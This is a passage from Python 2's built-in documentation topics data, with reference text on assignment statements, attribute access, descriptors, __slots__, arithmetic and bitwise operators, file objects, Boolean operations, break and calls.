(name):\n\n * If the name does not occur in a "global" statement in the\n current code block: the name is bound to the object in the current\n local namespace.\n\n * Otherwise: the name is bound to the object in the current global\n namespace.\n\n The name is rebound if it was already bound. This may cause the\n reference count for the object previously bound to the name to reach\n zero, causing the object to be deallocated and its destructor (if it\n has one) to be called.\n\n* If the target is a target list enclosed in parentheses or in\n square brackets: The object must be an iterable with the same number\n of items as there are targets in the target list, and its items are\n assigned, from left to right, to the corresponding targets.\n\n* If the target is an attribute reference: The primary expression in\n the reference is evaluated. It should yield an object with\n assignable attributes; if this is not the case, "TypeError" is\n raised. That object is then asked to assign the assigned object to\n the given attribute; if it cannot perform the assignment, it raises\n an exception (usually but not necessarily "AttributeError").\n\n Note: If the object is a class instance and the attribute reference\n occurs on both sides of the assignment operator, the RHS expression,\n "a.x" can access either an instance attribute or (if no instance\n attribute exists) a class attribute. The LHS target "a.x" is always\n set as an instance attribute, creating it if necessary. Thus, the\n two occurrences of "a.x" do not necessarily refer to the same\n attribute: if the RHS expression refers to a class attribute, the\n LHS creates a new instance attribute as the target of the\n assignment:\n\n class Cls:\n x = 3 # class variable\n inst = Cls()\n inst.x = inst.x + 1 # writes inst.x as 4 leaving Cls.x as 3\n\n This description does not necessarily apply to descriptor\n attributes, such as properties created with "property()".\n\n* If the target is a subscription: The primary expression in the\n reference is evaluated. It should yield either a mutable sequence\n object (such as a list) or a mapping object (such as a dictionary).\n Next, the subscript expression is evaluated.\n\n If the primary is a mutable sequence object (such as a list), the\n subscript must yield a plain integer. If it is negative, the\n sequence\'s length is added to it. The resulting value must be a\n nonnegative integer less than the sequence\'s length, and the\n sequence is asked to assign the assigned object to its item with\n that index. If the index is out of range, "IndexError" is raised\n (assignment to a subscripted sequence cannot add new items to a\n list).\n\n If the primary is a mapping object (such as a dictionary), the\n subscript must have a type compatible with the mapping\'s key type,\n and the mapping is then asked to create a key/datum pair which maps\n the subscript to the assigned object. This can either replace an\n existing key/value pair with the same key value, or insert a new\n key/value pair (if no key with the same value existed).\n\n* If the target is a slicing: The primary expression in the\n reference is evaluated. It should yield a mutable sequence object\n (such as a list). The assigned object should be a sequence object\n of the same type. Next, the lower and upper bound expressions are\n evaluated, insofar they are present; defaults are zero and the\n sequence\'s length. The bounds should evaluate to (small) integers.\n If either bound is negative, the sequence\'s length is added to it.\n The resulting bounds are clipped to lie between zero and the\n sequence\'s length, inclusive. Finally, the sequence object is asked\n to replace the slice with the items of the assigned sequence. The\n length of the slice may be different from the length of the assigned\n sequence, thus changing the length of the target sequence, if the\n object allows it.\n\n**CPython implementation detail:** In the current implementation, the\nsyntax for targets is taken to be the same as for expressions, and\ninvalid syntax is rejected during the code generation phase, causing\nless detailed error messages.\n\nWARNING: Although the definition of assignment implies that overlaps\nbetween the left-hand side and the right-hand side are \'safe\' (for\nexample "a, b = b, a" swaps two variables), overlaps *within* the\ncollection of assigned-to variables are not safe! For instance, the\nfollowing program prints "[0, 2]":\n\n x = [0, 1]\n i = 0\n i, x[i] = 1, 2\n print x\n\n\nAugmented assignment statements\n===============================\n\nAugmented assignment is the combination, in a single statement, of a\nbinary operation and an assignment statement:\n\n augmented_assignment_stmt ::= augtarget augop (expression_list | yield_expression)\n augtarget ::= identifier | attributeref | subscription | slicing\n augop ::= "+=" | "-=" | "*=" | "/=" | "//=" | "%=" | "**="\n | ">>=" | "<<=" | "&=" | "^=" | "|="\n\n(See section Primaries for the syntax definitions for the last three\nsymbols.)\n\nAn augmented assignment evaluates the target (which, unlike normal\nassignment statements, cannot be an unpacking) and the expression\nlist, performs the binary operation specific to the type of assignment\non the two operands, and assigns the result to the original target.\nThe target is only evaluated once.\n\nAn augmented assignment expression like "x += 1" can be rewritten as\n"x = x + 1" to achieve a similar, but not exactly equal effect. In the\naugmented version, "x" is only evaluated once. Also, when possible,\nthe actual operation is performed *in-place*, meaning that rather than\ncreating a new object and assigning that to the target, the old object\nis modified instead.\n\nWith the exception of assigning to tuples and multiple targets in a\nsingle statement, the assignment done by augmented assignment\nstatements is handled the same way as normal assignments. Similarly,\nwith the exception of the possible *in-place* behavior, the binary\noperation performed by augmented assignment is the same as the normal\nbinary operations.\n\nFor targets which are attribute references, the same caveat about\nclass and instance attributes applies as for regular assignments.\n', 'atom-identifiers': u'\nIdentifiers (Names)\n*******************\n\nAn identifier occurring as an atom is a name. See section Identifiers\nand keywords for lexical definition and section Naming and binding for\ndocumentation of naming and binding.\n\nWhen the name is bound to an object, evaluation of the atom yields\nthat object. When a name is not bound, an attempt to evaluate it\nraises a "NameError" exception.\n\n**Private name mangling:** When an identifier that textually occurs in\na class definition begins with two or more underscore characters and\ndoes not end in two or more underscores, it is considered a *private\nname* of that class. Private names are transformed to a longer form\nbefore code is generated for them. The transformation inserts the\nclass name, with leading underscores removed and a single underscore\ninserted, in front of the name. For example, the identifier "__spam"\noccurring in a class named "Ham" will be transformed to "_Ham__spam".\nThis transformation is independent of the syntactical context in which\nthe identifier is used. If the transformed name is extremely long\n(longer than 255 characters), implementation defined truncation may\nhappen. If the class name consists only of underscores, no\ntransformation is done.\n', 'atom-literals': u"\nLiterals\n********\n\nPython supports string literals and various numeric literals:\n\n literal ::= stringliteral | integer | longinteger\n | floatnumber | imagnumber\n\nEvaluation of a literal yields an object of the given type (string,\ninteger, long integer, floating point number, complex number) with the\ngiven value. The value may be approximated in the case of floating\npoint and imaginary (complex) literals. See section Literals for\ndetails.\n\nAll literals correspond to immutable data types, and hence the\nobject's identity is less important than its value. Multiple\nevaluations of literals with the same value (either the same\noccurrence in the program text or a different occurrence) may obtain\nthe same object or a different object with the same value.\n", 'attribute-access': u'\nCustomizing attribute access\n****************************\n\nThe following methods can be defined to customize the meaning of\nattribute access (use of, assignment to, or deletion of "x.name") for\nclass instances.\n\nobject.__getattr__(self, name)\n\n Called when an attribute lookup has not found the attribute in the\n usual places (i.e. it is not an instance attribute nor is it found\n in the class tree for "self"). "name" is the attribute name. This\n method should return the (computed) attribute value or raise an\n "AttributeError" exception.\n\n Note that if the attribute is found through the normal mechanism,\n "__getattr__()" is not called. (This is an intentional asymmetry\n between "__getattr__()" and "__setattr__()".) This is done both for\n efficiency reasons and because otherwise "__getattr__()" would have\n no way to access other attributes of the instance. Note that at\n least for instance variables, you can fake total control by not\n inserting any values in the instance attribute dictionary (but\n instead inserting them in another object). See the\n "__getattribute__()" method below for a way to actually get total\n control in new-style classes.\n\nobject.__setattr__(self, name, value)\n\n Called when an attribute assignment is attempted. This is called\n instead of the normal mechanism (i.e. store the value in the\n instance dictionary). *name* is the attribute name, *value* is the\n value to be assigned to it.\n\n If "__setattr__()" wants to assign to an instance attribute, it\n should not simply execute "self.name = value" --- this would cause\n a recursive call to itself. Instead, it should insert the value in\n the dictionary of instance attributes, e.g., "self.__dict__[name] =\n value". For new-style classes, rather than accessing the instance\n dictionary, it should call the base class method with the same\n name, for example, "object.__setattr__(self, name, value)".\n\nobject.__delattr__(self, name)\n\n Like "__setattr__()" but for attribute deletion instead of\n assignment. This should only be implemented if "del obj.name" is\n meaningful for the object.\n\n\nMore attribute access for new-style classes\n===========================================\n\nThe following methods only apply to new-style classes.\n\nobject.__getattribute__(self, name)\n\n Called unconditionally to implement attribute accesses for\n instances of the class. If the class also defines "__getattr__()",\n the latter will not be called unless "__getattribute__()" either\n calls it explicitly or raises an "AttributeError". This method\n should return the (computed) attribute value or raise an\n "AttributeError" exception. In order to avoid infinite recursion in\n this method, its implementation should always call the base class\n method with the same name to access any attributes it needs, for\n example, "object.__getattribute__(self, name)".\n\n Note: This method may still be bypassed when looking up special\n methods as the result of implicit invocation via language syntax\n or built-in functions. See Special method lookup for new-style\n classes.\n\n\nImplementing Descriptors\n========================\n\nThe following methods only apply when an instance of the class\ncontaining the method (a so-called *descriptor* class) appears in an\n*owner* class (the descriptor must be in either the owner\'s class\ndictionary or in the class dictionary for one of its parents). In the\nexamples below, "the attribute" refers to the attribute whose name is\nthe key of the property in the owner class\' "__dict__".\n\nobject.__get__(self, instance, owner)\n\n Called to get the attribute of the owner class (class attribute\n access) or of an instance of that class (instance attribute\n access). *owner* is always the owner class, while *instance* is the\n instance that the attribute was accessed through, or "None" when\n the attribute is accessed through the *owner*. This method should\n return the (computed) attribute value or raise an "AttributeError"\n exception.\n\nobject.__set__(self, instance, value)\n\n Called to set the attribute on an instance *instance* of the owner\n class to a new value, *value*.\n\nobject.__delete__(self, instance)\n\n Called to delete the attribute on an instance *instance* of the\n owner class.\n\n\nInvoking Descriptors\n====================\n\nIn general, a descriptor is an object attribute with "binding\nbehavior", one whose attribute access has been overridden by methods\nin the descriptor protocol: "__get__()", "__set__()", and\n"__delete__()". If any of those methods are defined for an object, it\nis said to be a descriptor.\n\nThe default behavior for attribute access is to get, set, or delete\nthe attribute from an object\'s dictionary. For instance, "a.x" has a\nlookup chain starting with "a.__dict__[\'x\']", then\n"type(a).__dict__[\'x\']", and continuing through the base classes of\n"type(a)" excluding metaclasses.\n\nHowever, if the looked-up value is an object defining one of the\ndescriptor methods, then Python may override the default behavior and\ninvoke the descriptor method instead. Where this occurs in the\nprecedence chain depends on which descriptor methods were defined and\nhow they were called. Note that descriptors are only invoked for new\nstyle objects or classes (ones that subclass "object()" or "type()").\n\nThe starting point for descriptor invocation is a binding, "a.x". How\nthe arguments are assembled depends on "a":\n\nDirect Call\n The simplest and least common call is when user code directly\n invokes a descriptor method: "x.__get__(a)".\n\nInstance Binding\n If binding to a new-style object instance, "a.x" is transformed\n into the call: "type(a).__dict__[\'x\'].__get__(a, type(a))".\n\nClass Binding\n If binding to a new-style class, "A.x" is transformed into the\n call: "A.__dict__[\'x\'].__get__(None, A)".\n\nSuper Binding\n If "a" is an instance of "super", then the binding "super(B,\n obj).m()" searches "obj.__class__.__mro__" for the base class "A"\n immediately preceding "B" and then invokes the descriptor with the\n call: "A.__dict__[\'m\'].__get__(obj, obj.__class__)".\n\nFor instance bindings, the precedence of descriptor invocation depends\non the which descriptor methods are defined. A descriptor can define\nany combination of "__get__()", "__set__()" and "__delete__()". If it\ndoes not define "__get__()", then accessing the attribute will return\nthe descriptor object itself unless there is a value in the object\'s\ninstance dictionary. If the descriptor defines "__set__()" and/or\n"__delete__()", it is a data descriptor; if it defines neither, it is\na non-data descriptor. Normally, data descriptors define both\n"__get__()" and "__set__()", while non-data descriptors have just the\n"__get__()" method. Data descriptors with "__set__()" and "__get__()"\ndefined always override a redefinition in an instance dictionary. In\ncontrast, non-data descriptors can be overridden by instances.\n\nPython methods (including "staticmethod()" and "classmethod()") are\nimplemented as non-data descriptors. Accordingly, instances can\nredefine and override methods. This allows individual instances to\nacquire behaviors that differ from other instances of the same class.\n\nThe "property()" function is implemented as a data descriptor.\nAccordingly, instances cannot override the behavior of a property.\n\n\n__slots__\n=========\n\nBy default, instances of both old and new-style classes have a\ndictionary for attribute storage. This wastes space for objects\nhaving very few instance variables. The space consumption can become\nacute when creating large numbers of instances.\n\nThe default can be overridden by defining *__slots__* in a new-style\nclass definition. The *__slots__* declaration takes a sequence of\ninstance variables and reserves just enough space in each instance to\nhold a value for each variable. Space is saved because *__dict__* is\nnot created for each instance.\n\n__slots__\n\n This class variable can be assigned a string, iterable, or sequence\n of strings with variable names used by instances. If defined in a\n new-style class, *__slots__* reserves space for the declared\n variables and prevents the automatic creation of *__dict__* and\n *__weakref__* for each instance.\n\n New in version 2.2.\n\nNotes on using *__slots__*\n\n* When inheriting from a class without *__slots__*, the *__dict__*\n attribute of that class will always be accessible, so a *__slots__*\n definition in the subclass is meaningless.\n\n* Without a *__dict__* variable, instances cannot be assigned new\n variables not listed in the *__slots__* definition. Attempts to\n assign to an unlisted variable name raises "AttributeError". If\n dynamic assignment of new variables is desired, then add\n "\'__dict__\'" to the sequence of strings in the *__slots__*\n declaration.\n\n Changed in version 2.3: Previously, adding "\'__dict__\'" to the\n *__slots__* declaration would not enable the assignment of new\n attributes not specifically listed in the sequence of instance\n variable names.\n\n* Without a *__weakref__* variable for each instance, classes\n defining *__slots__* do not support weak references to its\n instances. If weak reference support is needed, then add\n "\'__weakref__\'" to the sequence of strings in the *__slots__*\n declaration.\n\n Changed in version 2.3: Previously, adding "\'__weakref__\'" to the\n *__slots__* declaration would not enable support for weak\n references.\n\n* *__slots__* are implemented at the class level by creating\n descriptors (Implementing Descriptors) for each variable name. As a\n result, class attributes cannot be used to set default values for\n instance variables defined by *__slots__*; otherwise, the class\n attribute would overwrite the descriptor assignment.\n\n* The action of a *__slots__* declaration is limited to the class\n where it is defined. As a result, subclasses will have a *__dict__*\n unless they also define *__slots__* (which must only contain names\n of any *additional* slots).\n\n* If a class defines a slot also defined in a base class, the\n instance variable defined by the base class slot is inaccessible\n (except by retrieving its descriptor directly from the base class).\n This renders the meaning of the program undefined. In the future, a\n check may be added to prevent this.\n\n* Nonempty *__slots__* does not work for classes derived from\n "variable-length" built-in types such as "long", "str" and "tuple".\n\n* Any non-string iterable may be assigned to *__slots__*. Mappings\n may also be used; however, in the future, special meaning may be\n assigned to the values corresponding to each key.\n\n* *__class__* assignment works only if both classes have the same\n *__slots__*.\n\n Changed in version 2.6: Previously, *__class__* assignment raised an\n error if either new or old class had *__slots__*.\n', 'attribute-references': u'\nAttribute references\n********************\n\nAn attribute reference is a primary followed by a period and a name:\n\n attributeref ::= primary "." identifier\n\nThe primary must evaluate to an object of a type that supports\nattribute references, e.g., a module, list, or an instance. This\nobject is then asked to produce the attribute whose name is the\nidentifier. If this attribute is not available, the exception\n"AttributeError" is raised. Otherwise, the type and value of the\nobject produced is determined by the object. Multiple evaluations of\nthe same attribute reference may yield different objects.\n', 'augassign': u'\nAugmented assignment statements\n*******************************\n\nAugmented assignment is the combination, in a single statement, of a\nbinary operation and an assignment statement:\n\n augmented_assignment_stmt ::= augtarget augop (expression_list | yield_expression)\n augtarget ::= identifier | attributeref | subscription | slicing\n augop ::= "+=" | "-=" | "*=" | "/=" | "//=" | "%=" | "**="\n | ">>=" | "<<=" | "&=" | "^=" | "|="\n\n(See section Primaries for the syntax definitions for the last three\nsymbols.)\n\nAn augmented assignment evaluates the target (which, unlike normal\nassignment statements, cannot be an unpacking) and the expression\nlist, performs the binary operation specific to the type of assignment\non the two operands, and assigns the result to the original target.\nThe target is only evaluated once.\n\nAn augmented assignment expression like "x += 1" can be rewritten as\n"x = x + 1" to achieve a similar, but not exactly equal effect. In the\naugmented version, "x" is only evaluated once. Also, when possible,\nthe actual operation is performed *in-place*, meaning that rather than\ncreating a new object and assigning that to the target, the old object\nis modified instead.\n\nWith the exception of assigning to tuples and multiple targets in a\nsingle statement, the assignment done by augmented assignment\nstatements is handled the same way as normal assignments. Similarly,\nwith the exception of the possible *in-place* behavior, the binary\noperation performed by augmented assignment is the same as the normal\nbinary operations.\n\nFor targets which are attribute references, the same caveat about\nclass and instance attributes applies as for regular assignments.\n', 'binary': u'\nBinary arithmetic operations\n****************************\n\nThe binary arithmetic operations have the conventional priority\nlevels. Note that some of these operations also apply to certain non-\nnumeric types. Apart from the power operator, there are only two\nlevels, one for multiplicative operators and one for additive\noperators:\n\n m_expr ::= u_expr | m_expr "*" u_expr | m_expr "//" u_expr | m_expr "/" u_expr\n | m_expr "%" u_expr\n a_expr ::= m_expr | a_expr "+" m_expr | a_expr "-" m_expr\n\nThe "*" (multiplication) operator yields the product of its arguments.\nThe arguments must either both be numbers, or one argument must be an\ninteger (plain or long) and the other must be a sequence. In the\nformer case, the numbers are converted to a common type and then\nmultiplied together. In the latter case, sequence repetition is\nperformed; a negative repetition factor yields an empty sequence.\n\nThe "/" (division) and "//" (floor division) operators yield the\nquotient of their arguments. The numeric arguments are first\nconverted to a common type. Plain or long integer division yields an\ninteger of the same type; the result is that of mathematical division\nwith the \'floor\' function applied to the result. Division by zero\nraises the "ZeroDivisionError" exception.\n\nThe "%" (modulo) operator yields the remainder from the division of\nthe first argument by the second. The numeric arguments are first\nconverted to a common type. A zero right argument raises the\n"ZeroDivisionError" exception. The arguments may be floating point\nnumbers, e.g., "3.14%0.7" equals "0.34" (since "3.14" equals "4*0.7 +\n0.34".) The modulo operator always yields a result with the same sign\nas its second operand (or zero); the absolute value of the result is\nstrictly smaller than the absolute value of the second operand [2].\n\nThe integer division and modulo operators are connected by the\nfollowing identity: "x == (x/y)*y + (x%y)". Integer division and\nmodulo are also connected with the built-in function "divmod()":\n"divmod(x, y) == (x/y, x%y)". These identities don\'t hold for\nfloating point numbers; there similar identities hold approximately\nwhere "x/y" is replaced by "floor(x/y)" or "floor(x/y) - 1" [3].\n\nIn addition to performing the modulo operation on numbers, the "%"\noperator is also overloaded by string and unicode objects to perform\nstring formatting (also known as interpolation). The syntax for string\nformatting is described in the Python Library Reference, section\nString Formatting Operations.\n\nDeprecated since version 2.3: The floor division operator, the modulo\noperator, and the "divmod()" function are no longer defined for\ncomplex numbers. Instead, convert to a floating point number using\nthe "abs()" function if appropriate.\n\nThe "+" (addition) operator yields the sum of its arguments. The\narguments must either both be numbers or both sequences of the same\ntype. In the former case, the numbers are converted to a common type\nand then added together. In the latter case, the sequences are\nconcatenated.\n\nThe "-" (subtraction) operator yields the difference of its arguments.\nThe numeric arguments are first converted to a common type.\n', 'bitwise': u'\nBinary bitwise operations\n*************************\n\nEach of the three bitwise operations has a different priority level:\n\n and_expr ::= shift_expr | and_expr "&" shift_expr\n xor_expr ::= and_expr | xor_expr "^" and_expr\n or_expr ::= xor_expr | or_expr "|" xor_expr\n\nThe "&" operator yields the bitwise AND of its arguments, which must\nbe plain or long integers. The arguments are converted to a common\ntype.\n\nThe "^" operator yields the bitwise XOR (exclusive OR) of its\narguments, which must be plain or long integers. The arguments are\nconverted to a common type.\n\nThe "|" operator yields the bitwise (inclusive) OR of its arguments,\nwhich must be plain or long integers. The arguments are converted to\na common type.\n', 'bltin-code-objects': u'\nCode Objects\n************\n\nCode objects are used by the implementation to represent "pseudo-\ncompiled" executable Python code such as a function body. They differ\nfrom function objects because they don\'t contain a reference to their\nglobal execution environment. Code objects are returned by the built-\nin "compile()" function and can be extracted from function objects\nthrough their "func_code" attribute. See also the "code" module.\n\nA code object can be executed or evaluated by passing it (instead of a\nsource string) to the "exec" statement or the built-in "eval()"\nfunction.\n\nSee The standard type hierarchy for more information.\n', 'bltin-ellipsis-object': u'\nThe Ellipsis Object\n*******************\n\nThis object is used by extended slice notation (see Slicings). It\nsupports no special operations. There is exactly one ellipsis object,\nnamed "Ellipsis" (a built-in name).\n\nIt is written as "Ellipsis". When in a subscript, it can also be\nwritten as "...", for example "seq[...]".\n', 'bltin-file-objects': u'\nFile Objects\n************\n\nFile objects are implemented using C\'s "stdio" package and can be\ncreated with the built-in "open()" function. File objects are also\nreturned by some other built-in functions and methods, such as\n"os.popen()" and "os.fdopen()" and the "makefile()" method of socket\nobjects. Temporary files can be created using the "tempfile" module,\nand high-level file operations such as copying, moving, and deleting\nfiles and directories can be achieved with the "shutil" module.\n\nWhen a file operation fails for an I/O-related reason, the exception\n"IOError" is raised. This includes situations where the operation is\nnot defined for some reason, like "seek()" on a tty device or writing\na file opened for reading.\n\nFiles have the following methods:\n\nfile.close()\n\n Close the file. A closed file cannot be read or written any more.\n Any operation which requires that the file be open will raise a\n "ValueError" after the file has been closed. Calling "close()"\n more than once is allowed.\n\n As of Python 2.5, you can avoid having to call this method\n explicitly if you use the "with" statement. For example, the\n following code will automatically close *f* when the "with" block\n is exited:\n\n from __future__ import with_statement # This isn\'t required in Python 2.6\n\n with open("hello.txt") as f:\n for line in f:\n print line,\n\n In older versions of Python, you would have needed to do this to\n get the same effect:\n\n f = open("hello.txt")\n try:\n for line in f:\n print line,\n finally:\n f.close()\n\n Note: Not all "file-like" types in Python support use as a\n context manager for the "with" statement. If your code is\n intended to work with any file-like object, you can use the\n function "contextlib.closing()" instead of using the object\n directly.\n\nfile.flush()\n\n Flush the internal buffer, like "stdio"\'s "fflush()". This may be\n a no-op on some file-like objects.\n\n Note: "flush()" does not necessarily write the file\'s data to\n disk. Use "flush()" followed by "os.fsync()" to ensure this\n behavior.\n\nfile.fileno()\n\n Return the integer "file descriptor" that is used by the underlying\n implementation to request I/O operations from the operating system.\n This can be useful for other, lower level interfaces that use file\n descriptors, such as the "fcntl" module or "os.read()" and friends.\n\n Note: File-like objects which do not have a real file descriptor\n should *not* provide this method!\n\nfile.isatty()\n\n Return "True" if the file is connected to a tty(-like) device, else\n "False".\n\n Note: If a file-like object is not associated with a real file,\n this method should *not* be implemented.\n\nfile.next()\n\n A file object is its own iterator, for example "iter(f)" returns\n *f* (unless *f* is closed). When a file is used as an iterator,\n typically in a "for" loop (for example, "for line in f: print\n line.strip()"), the "next()" method is called repeatedly. This\n method returns the next input line, or raises "StopIteration" when\n EOF is hit when the file is open for reading (behavior is undefined\n when the file is open for writing). In order to make a "for" loop\n the most efficient way of looping over the lines of a file (a very\n common operation), the "next()" method uses a hidden read-ahead\n buffer. As a consequence of using a read-ahead buffer, combining\n "next()" with other file methods (like "readline()") does not work\n right. However, using "seek()" to reposition the file to an\n absolute position will flush the read-ahead buffer.\n\n New in version 2.3.\n\nfile.read([size])\n\n Read at most *size* bytes from the file (less if the read hits EOF\n before obtaining *size* bytes). If the *size* argument is negative\n or omitted, read all data until EOF is reached. The bytes are\n returned as a string object. An empty string is returned when EOF\n is encountered immediately. (For certain files, like ttys, it\n makes sense to continue reading after an EOF is hit.) Note that\n this method may call the underlying C function "fread()" more than\n once in an effort to acquire as close to *size* bytes as possible.\n Also note that when in non-blocking mode, less data than was\n requested may be returned, even if no *size* parameter was given.\n\n Note: This function is simply a wrapper for the underlying\n "fread()" C function, and will behave the same in corner cases,\n such as whether the EOF value is cached.\n\nfile.readline([size])\n\n Read one entire line from the file. A trailing newline character\n is kept in the string (but may be absent when a file ends with an\n incomplete line). [6] If the *size* argument is present and non-\n negative, it is a maximum byte count (including the trailing\n newline) and an incomplete line may be returned. When *size* is not\n 0, an empty string is returned *only* when EOF is encountered\n immediately.\n\n Note: Unlike "stdio"\'s "fgets()", the returned string contains\n null characters ("\'\\0\'") if they occurred in the input.\n\nfile.readlines([sizehint])\n\n Read until EOF using "readline()" and return a list containing the\n lines thus read. If the optional *sizehint* argument is present,\n instead of reading up to EOF, whole lines totalling approximately\n *sizehint* bytes (possibly after rounding up to an internal buffer\n size) are read. Objects implementing a file-like interface may\n choose to ignore *sizehint* if it cannot be implemented, or cannot\n be implemented efficiently.\n\nfile.xreadlines()\n\n This method returns the same thing as "iter(f)".\n\n New in version 2.1.\n\n Deprecated since version 2.3: Use "for line in file" instead.\n\nfile.seek(offset[, whence])\n\n Set the file\'s current position, like "stdio"\'s "fseek()". The\n *whence* argument is optional and defaults to "os.SEEK_SET" or "0"\n (absolute file positioning); other values are "os.SEEK_CUR" or "1"\n (seek relative to the current position) and "os.SEEK_END" or "2"\n (seek relative to the file\'s end). There is no return value.\n\n For example, "f.seek(2, os.SEEK_CUR)" advances the position by two\n and "f.seek(-3, os.SEEK_END)" sets the position to the third to\n last.\n\n Note that if the file is opened for appending (mode "\'a\'" or\n "\'a+\'"), any "seek()" operations will be undone at the next write.\n If the file is only opened for writing in append mode (mode "\'a\'"),\n this method is essentially a no-op, but it remains useful for files\n opened in append mode with reading enabled (mode "\'a+\'"). If the\n file is opened in text mode (without "\'b\'"), only offsets returned\n by "tell()" are legal. Use of other offsets causes undefined\n behavior.\n\n Note that not all file objects are seekable.\n\n Changed in version 2.6: Passing float values as offset has been\n deprecated.\n\nfile.tell()\n\n Return the file\'s current position, like "stdio"\'s "ftell()".\n\n Note: On Windows, "tell()" can return illegal values (after an\n "fgets()") when reading files with Unix-style line-endings. Use\n binary mode ("\'rb\'") to circumvent this problem.\n\nfile.truncate([size])\n\n Truncate the file\'s size. If the optional *size* argument is\n present, the file is truncated to (at most) that size. The size\n defaults to the current position. The current file position is not\n changed. Note that if a specified size exceeds the file\'s current\n size, the result is platform-dependent: possibilities include that\n the file may remain unchanged, increase to the specified size as if\n zero-filled, or increase to the specified size with undefined new\n content. Availability: Windows, many Unix variants.\n\nfile.write(str)\n\n Write a string to the file. There is no return value. Due to\n buffering, the string may not actually show up in the file until\n the "flush()" or "close()" method is called.\n\nfile.writelines(sequence)\n\n Write a sequence of strings to the file. The sequence can be any\n iterable object producing strings, typically a list of strings.\n There is no return value. (The name is intended to match\n "readlines()"; "writelines()" does not add line separators.)\n\nFiles support the iterator protocol. Each iteration returns the same\nresult as "readline()", and iteration ends when the "readline()"\nmethod returns an empty string.\n\nFile objects also offer a number of other interesting attributes.\nThese are not required for file-like objects, but should be\nimplemented if they make sense for the particular object.\n\nfile.closed\n\n bool indicating the current state of the file object. This is a\n read-only attribute; the "close()" method changes the value. It may\n not be available on all file-like objects.\n\nfile.encoding\n\n The encoding that this file uses. When Unicode strings are written\n to a file, they will be converted to byte strings using this\n encoding. In addition, when the file is connected to a terminal,\n the attribute gives the encoding that the terminal is likely to use\n (that information might be incorrect if the user has misconfigured\n the terminal). The attribute is read-only and may not be present\n on all file-like objects. It may also be "None", in which case the\n file uses the system default encoding for converting Unicode\n strings.\n\n New in version 2.3.\n\nfile.errors\n\n The Unicode error handler used along with the encoding.\n\n New in version 2.6.\n\nfile.mode\n\n The I/O mode for the file. If the file was created using the\n "open()" built-in function, this will be the value of the *mode*\n parameter. This is a read-only attribute and may not be present on\n all file-like objects.\n\nfile.name\n\n If the file object was created using "open()", the name of the\n file. Otherwise, some string that indicates the source of the file\n object, of the form "<...>". This is a read-only attribute and may\n not be present on all file-like objects.\n\nfile.newlines\n\n If Python was built with *universal newlines* enabled (the default)\n this read-only attribute exists, and for files opened in universal\n newline read mode it keeps track of the types of newlines\n encountered while reading the file. The values it can take are\n "\'\\r\'", "\'\\n\'", "\'\\r\\n\'", "None" (unknown, no newlines read yet) or\n a tuple containing all the newline types seen, to indicate that\n multiple newline conventions were encountered. For files not opened\n in universal newlines read mode the value of this attribute will be\n "None".\n\nfile.softspace\n\n Boolean that indicates whether a space character needs to be\n printed before another value when using the "print" statement.\n Classes that are trying to simulate a file object should also have\n a writable "softspace" attribute, which should be initialized to\n zero. This will be automatic for most classes implemented in\n Python (care may be needed for objects that override attribute\n access); types implemented in C will have to provide a writable\n "softspace" attribute.\n\n Note: This attribute is not used to control the "print"\n statement, but to allow the implementation of "print" to keep\n track of its internal state.\n', 'bltin-null-object': u'\nThe Null Object\n***************\n\nThis object is returned by functions that don\'t explicitly return a\nvalue. It supports no special operations. There is exactly one null\nobject, named "None" (a built-in name).\n\nIt is written as "None".\n', 'bltin-type-objects': u'\nType Objects\n************\n\nType objects represent the various object types. An object\'s type is\naccessed by the built-in function "type()". There are no special\noperations on types. The standard module "types" defines names for\nall standard built-in types.\n\nTypes are written like this: "<type \'int\'>".\n', 'booleans': u'\nBoolean operations\n******************\n\n or_test ::= and_test | or_test "or" and_test\n and_test ::= not_test | and_test "and" not_test\n not_test ::= comparison | "not" not_test\n\nIn the context of Boolean operations, and also when expressions are\nused by control flow statements, the following values are interpreted\nas false: "False", "None", numeric zero of all types, and empty\nstrings and containers (including strings, tuples, lists,\ndictionaries, sets and frozensets). All other values are interpreted\nas true. (See the "__nonzero__()" special method for a way to change\nthis.)\n\nThe operator "not" yields "True" if its argument is false, "False"\notherwise.\n\nThe expression "x and y" first evaluates *x*; if *x* is false, its\nvalue is returned; otherwise, *y* is evaluated and the resulting value\nis returned.\n\nThe expression "x or y" first evaluates *x*; if *x* is true, its value\nis returned; otherwise, *y* is evaluated and the resulting value is\nreturned.\n\n(Note that neither "and" nor "or" restrict the value and type they\nreturn to "False" and "True", but rather return the last evaluated\nargument. This is sometimes useful, e.g., if "s" is a string that\nshould be replaced by a default value if it is empty, the expression\n"s or \'foo\'" yields the desired value. Because "not" has to invent a\nvalue anyway, it does not bother to return a value of the same type as\nits argument, so e.g., "not \'foo\'" yields "False", not "\'\'".)\n', 'break': u'\nThe "break" statement\n*********************\n\n break_stmt ::= "break"\n\n"break" may only occur syntactically nested in a "for" or "while"\nloop, but not nested in a function or class definition within that\nloop.\n\nIt terminates the nearest enclosing loop, skipping the optional "else"\nclause if the loop has one.\n\nIf a "for" loop is terminated by "break", the loop control target\nkeeps its current value.\n\nWhen "break" passes control out of a "try" statement with a "finally"\nclause, that "finally" clause is executed before really leaving the\nloop.\n', 'callable-types': u'\nEmulating callable objects\n**************************\n\nobject.__call__(self[, args...])\n\n Called when the instance is "called" as a function; if this method\n is defined, "x(arg1, arg2, ...)" is a shorthand for\n "x.__call__(arg1, arg2, ...)".\n', 'calls': u'\nCalls\n*****\n\nA call calls a callable object (e.g., a *function*) with a possibly\nempty series of *arguments*:\n\n call ::= primary "(" [argument_list [","]\n | expression genexpr_for] ")"\n argument_list ::= positional_arguments ["," keyword_arguments]\n ["," "*" expression] ["," keyword_arguments]\n ["," "**" expression]\n | keyword_arguments ["," "*" expression]\n ["," "**" expression]\n | "*" expression ["," keyword_arguments] ["," "**" expression]\n | "**" expression\n positional_arguments ::= expression ("," expression)*\n keyword_arguments ::= keyword_item ("," keyword_item)*\n keyword_item ::= identifier "=" expression\n\nA trailing comma may be present after the positional and keyword\narguments but does not affect the semantics.\n\nThe primary must evaluate to a callable object (user-defined\nfunctions, built-in functions, methods of built-in objects, class\nobjects, methods of class instances, and certain class instances\nthemselves are callable; extensions may define additional callable\nobject types). All argument expressions are evaluated before the call\nis attempted. Please refer to section Function definitions for the\nsyntax of formal *parameter* lists.\n\nIf keyword arguments are present, they are first converted to\npositional arguments, as follows. First, a list of unfilled slots is\ncreated for the formal parameters. If there are N positional\narguments, they are placed in the first N slots. Next, for each\nkeyword argument, the identifier is used to determine the\ncorresponding slot (if the identifier is the same as the first formal\nparameter name, the first slot is used, and so on). If the slot is\nalready filled, a "TypeError" exception is raised. 